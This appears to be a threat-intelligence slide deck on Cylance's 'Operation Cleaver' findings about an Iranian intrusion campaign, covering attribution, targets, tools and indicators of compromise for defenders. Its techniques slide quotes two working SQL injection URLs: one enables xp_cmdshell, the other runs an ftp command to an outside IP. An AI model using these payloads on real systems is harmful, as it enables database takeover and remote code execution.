Upload
ismael-norrington
View
216
Download
2
Tags:
Embed Size (px)
Citation preview
Operation CleaverIran is the next China
Numerous references inside the namespaces of their custom bot code codenamed TinyZbot e.g.:
e:\projects\cleaver\trunk\zhoupin_cleaver\obj\x86\release\netscp.pdb
PDBs associated with the hacker name “Jimbp” e.g.:
c:\users\jimbp\desktop\binder_1 - for cleaver\binder_1\obj\x86\release\setup.pdb
PDBs associated with the keystroke loggers, artifacts, and numerous other tools, e.g.:
e:\Projects\Cleaver\trunk\MainModule\obj\Release\MainModule.pdb
Why “Cleaver”?The name…
Targeting of Critical infrastructure globally.
Shocking Level of access.Network. Systems.
Applications. Databases. DNS. Paypal. GoDaddy.
Basically Everything.
Why Now?Exposing Cleaver…
• Prior to 2010, Iran as a target was almost non-existent and as the attacker mentioned only in terms of website defacement
• In 2010, Stuxnet was realized, severely impacting Iran’s Nuclear program
• Retaliation began…• Cleaver is an Iranian born campaign
dating to 2012, with some data from 2007.
• Since Shamoon, we have witnessed an evolution of skillset and threat actor
IRAN CYBER ATTACKSExposing Cleaver…
SourcingIranian
GeoIP Location: IranNet block: 78.109.194.96 - 78.109.194.127Owner: Tarh AndishanEmail: tarh.andishan(at)yahoo.comPhone: +98-21-22496658NIC-Handle: TAR1973-RIPE
Tarh Andishan – meaning “Innovators”, “Inventors”
78.109.194.96/27 – Current – Afranet, Iran217.11.17.96/28 - 10/22/2014 – Afranet, Iran81.90.144.104/29 - 10/5/2014 – Afranet, Middle East Oil, Iran31.47.35.0/24 – 11/2012 – Afranet, Iran
The logger module binary’s file description value is the following:
ye file khube DG. ba in ham kari nadashte bashin
Roughly translated from Persian, this text says:DG is a good file, don’t bother with this
Starting Nmap 6.25 at 2012-08-17 09:18 Iran Daylight Time
Netafraz.com infrastructure in Iran
Persian hacker names: Salman Ghazikhani, Bahman Mohebbi, Kaj, Parviz, Alireza, etc.
IranRedline.org
In one of IranRedLine.org’s blog posts, the author speculates on Tarh Andishan’s involvementwith the Iranian government by showing close proximity to SPND, the Organization of DefensiveInnovation and Research
SourcingTarh Andishan
TTPsSQL Injection
http://localhost/Demos/demo.cfm?Edit%26ID=111;declare%20@b1%20varchar(8000);set%20@b1=%20show advanced options;declare%20@b2%20varchar(8000);set%20@b2=%20xp_cmdshell;%20EXEC%20master.dbo.sp_configure%20@b1,%201;RECONFIGURE;EXEC%20master.dbo.sp_configure%20@b2,%201;RECONFIGURE;--%20
http://localhost/Demos/demo.cfm?Edit%26ID=111;declare%20@b1%20varchar(8000);set%20@b1=%20ftp -A 108.175.152.230;%20exec%20master..xp_cmdshell%20@b1--%2
TTPsSpearphishing: fake resume tool
TTPsSpearphishing: Resume Submitter
Escalation and PivotingTools and Toys…
Public: Netcat, Cain & Abel, psexec, Mimikatz, WCE, Putty, Plink, nmap, xcmd, etc.
Custom: TinyZbot, NetC, ASPX webshells, SYN flooder, ARP poisoning, Csext, etc.
Exploits: MS08-067 (Conficker) and MS10-015 (KiTrap0D)
• Signing encryption keys for major airline company• Usernames and passwords from dozens of companies• 250k Windows credentials at a single Oil company• Airport and Airline crew credentials• Airport network configuration files• SNMP credentials for major Energy Companies• Student information targeting
Access and ExfilThe damage…
Indicators of Compromise (IOCs)Let’s go hunting… or preferably PREVENTING!
Domainsdoosan-job(dot)comdownloadsservers(dot)comdrivercenterupdate(dot)comeasyresumecreatorpro(dot)comgoogleproductupdate(dot)comgoogleproductupdate(dot)netkundenpflege.menrad(dot)demicrosoftactiveservices(dot)commicrosoftmiddleast(dot)commicrosoftonlineupdates(dot)commicrosoftserverupdate(dot)commicrosoftupdateserver(dot)netmicrosoftwindowsresources(dot)commicrosoftwindowsupdate(dot)netnorthropgrumman(dot)netteledyne-jobs(dot)comwindowscentralupdate(dot)comwindowssecurityupdate(dot)comwindowsserverupdate(dot)comwindowsupdateserver(dot)comwww.gesunddurchsjahr(dot)de
Emails for Domain Registrationdavejsmith200(at)outlook.comsalman.ghazikhani(at)outlook.combtr.8624(at)yahoo.comghanbarianco(at)gmail.comazlinux73(at)gmail.comdomain(at)netafraz.comtarh.andishan(at)yahoo.comahmadi(at)odeconline.comkafe0(at)yahoo.comdg_co(at)yahoo.comzahiry_alireza(at)yahoo.comzahiry.alireza(at)gmail.com
Emails used for Exfiltrationtestmail_00001(at)yahoo.comTerafficAnalyzer(at)yahoo.comdyanachear(at)beyondsys.com
50.23.164.16164.120.128.15464.120.208.7464.120.208.7564.120.208.7664.120.208.7864.120.208.15466.96.252.19878.109.194.11480.243.182.14987.98.167.7187.98.167.8587.98.167.14188.150.214.16288.150.214.16688.150.214.16888.150.214.170
95.211.191.22595.211.191.24795.211.241.24995.211.241.251108.175.152.230108.175.153.158159.253.144.209173.192.144.68174.36.195.158184.82.158.18184.82.181.48188.227.180.213192.111.145.197203.150.224.249207.182.142.68212.87.154.12212.87.154.14
MutexesZSC1
Adobe Report ServiceBmgr
Dynamic MutexesdemdaramdidamILoveThisMutex
Installed Services NamesCOM+ System ExtentionsCOM__System_Extentions
Network Connectivity ManagerService1
MsNetMonitorPcapins
scManagerSvcCredentialSync
Adobe Report Service
IP Addresses
Resources• “Operation Cleaver” Report• Cylance Blog• Twitter: @cylanceinc• Twitter: @hackingexposed• Email: [email protected] for more
information• Yara rules on Cylance.com• Test Drive CylancePROTECT:
my.cylance.com